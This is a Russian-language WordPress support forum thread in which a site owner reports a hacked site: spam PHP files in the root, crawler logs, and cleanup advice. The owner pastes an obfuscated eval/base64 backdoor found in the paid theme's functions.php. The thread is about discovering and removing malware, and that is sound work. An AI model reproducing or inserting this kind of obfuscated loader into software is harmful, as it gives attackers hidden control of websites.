Поддержка Проблемы и решения Появились в корне сайта левые файлы

  • Подскажите пожалуйста может это у кого было, в интернете не нашел, в корне сайта появились левые файлы (есть другой сайт, та же версия WP, там такого нет), файлы:
    ceshi.php
    cfyh.php
    cmit.php
    cod.php
    ctbu.php
    file.php
    hmep.php
    jobh.php
    khbk.php
    wkts.php

    Вот часть логов, а так очень очень много за сутки:
    66.249.64.41 — — [11/Jan/2017:04:01:58 +0300] «GET /ctbu.php?Sumally/aptaoga-21/obcaplanh-2597 HTTP/1.0» 200 30845 «-» «Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)»
    66.249.64.45 — — [11/Jan/2017:04:02:05 +0300] «GET /khbk.php?txvxipa/host/2016/ HTTP/1.0» 200 54083 «-» «Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)»
    66.249.64.43 — — [11/Jan/2017:04:02:17 +0300] «GET /ctbu.php?UNITON-9./Worjp-22909./ HTTP/1.0» 200 40206 «-» «Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)»
    66.249.64.41 — — [11/Jan/2017:04:02:31 +0300] «GET /xkla.php?yywwsb/agency/6773.htm HTTP/1.0» 200 83772 «-» «Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)»
    66.249.64.41 — — [11/Jan/2017:04:02:36 +0300] «GET /ctbu.php?fashion_9/ikbmgakj_8187 HTTP/1.0» 200 27328 «-» «Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)»

    Они конечно у меня пойдут под удаление, но от куда они появились не пойму, фтп уже давно не пользовался.

    Могу содержание файлов написать тут или на файлообменник выложить их, может кто подскажет что это за бяка такая

    • Тема изменена 7 лет, 2 месяца назад пользователем hardom.
Просмотр 12 ответов — с 1 по 12 (всего 12)
  • Так же появились пять папок, с содержанием двух фалов, один файл htaccess, второй файл второй файл с расширением php с названием из четырех букв, названия такие — wvqu, nksj и тд, название папок из четырех — пяти букв типа такого — gtyz, iodk, oktb и тд.

    вирусня.
    взломали через тему\плагин\скрипты на сервере или еще как.

    тема у меня платная, на втором сайте всё ок, плагины такие стоят:
    Akismet, Cyr to Lat enhanced, WP No External Links
    Скрипты не какие не ставил.
    Самое обидное что из безумного количество действий этими файлами, логи за три дня только.

    тема у меня платная,

    тем более… Кто их проверяет чего в них напихано..

    хостер проверил антивирусом, есть подозрения на тему (shootingstar-premium/functions.php) и плагин Jetpack (wp-content/plugins/jetpack/modules/theme-tools/featured-content.php
    и wp-content/plugins/jetpack/modules/custom-css/csstidy/data-wp.inc.php)

    плагин Jetpack

    Файлы плагины Вы можете сравнить с оригинальными https://plugins.trac.wordpress.org/browser/jetpack/trunk

    а тему каким плагином лучше проверить? или вручную код смотреть?

    а тему каким плагином лучше проверить?

    Тему лучше сменить.

    Сравнил все исходные файлы темы, чистые или имеющейся на сайте, нашел в файле functions.php, сверху вот такую бяку:

    $O00OO0=urldecode(«%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A»);$O00O0O=$O00OO0{3}.$O00OO0{6}.$O00OO0{33}.$O00OO0{30};$O0OO00=$O00OO0{33}.$O00OO0{10}.$O00OO0{24}.$O00OO0{10}.$O00OO0{24};$OO0O00=$O0OO00{0}.$O00OO0{18}.$O00OO0{3}.$O0OO00{0}.$O0OO00{1}.$O00OO0{24};$OO0000=$O00OO0{7}.$O00OO0{13};$O00O0O.=$O00OO0{22}.$O00OO0{36}.$O00OO0{29}.$O00OO0{26}.$O00OO0{30}.$O00OO0{32}.$O00OO0{35}.$O00OO0{26}.$O00OO0{30};eval($O00O0O(«JE8wTzAwMD0iUHh0RFFxZnpZYWhtd0N2Wk51QmpMWHNNVWtJS0piSEVXT2dGeVZBU0dpUm5sVGRjcm9wZU5GU0JIREpreFViS1lDc0VHWHRmakl3cW5ocEF6Z1JsV1Z2ZW9UeW1hdUxkaU9yY1BaUU1OQjlZVVJ5R0N1TEtyV1NGcEIwdkhDTEpMMFRuV29yS3JXU0Z6MTA3cGFpS0FDTEtyV1NGcEIwOXBDcjB6b2k3RVdHWmdvYnlFSUViZ0N2aEkxdE5uMUxnejJFMXgyUzVnM24wcWtwRnoxMFFBT1NpTWFpMFYzMEdDS1RmVWE4dnhJdFFuS1RGcldUa3JDdlFWWTBBRWRUWHgzTFFnMjR2eEl0UW5LVEZyV1RrckN2UU1ZMEFDV2lLQWx5aEkwcmVUZXdkZzN5ZElteTlObXlkeDJiaXgyd2RBSDBBQ0hpN0JIWnpDbXRvRUlMMWNLNHZwS0dzZ0s1aXgzTER4SzFzcktUUWMyOVBwZndHQ3ZoenBhVDRVSUhaQU93R0N2aHZwQ3l2SkgwQUpIMEFOazQ9IjtldmFsKCc/PicuJE8wME8wTygkTzBPTzAwKCRPTzBPMDAoJE8wTzAwMCwkT08wMDAwKjIpLCRPTzBPMDAoJE8wTzAwMCwkT08wMDAwLCRPTzAwMDApLCRPTzBPMDAoJE8wTzAwMCwwLCRPTzAwMDApKSkpOw==»));

    В целом всё почистил, теперь регулярно буду следить, темку запасную на всякий случай буду подбирать

    • Ответ изменён 7 лет, 2 месяца назад пользователем hardom.

    почему то не до конца код отображается

    Сайт дочистил, остался один спорный файл в корне, xmlrpc.php, есть у кого такой?

    остался один спорный файл в корне, xmlrpc.php, есть у кого такой?

    https://core.trac.wordpress.org/browser/trunk/src/

Просмотр 12 ответов — с 1 по 12 (всего 12)
  • Тема «Появились в корне сайта левые файлы» закрыта для новых ответов.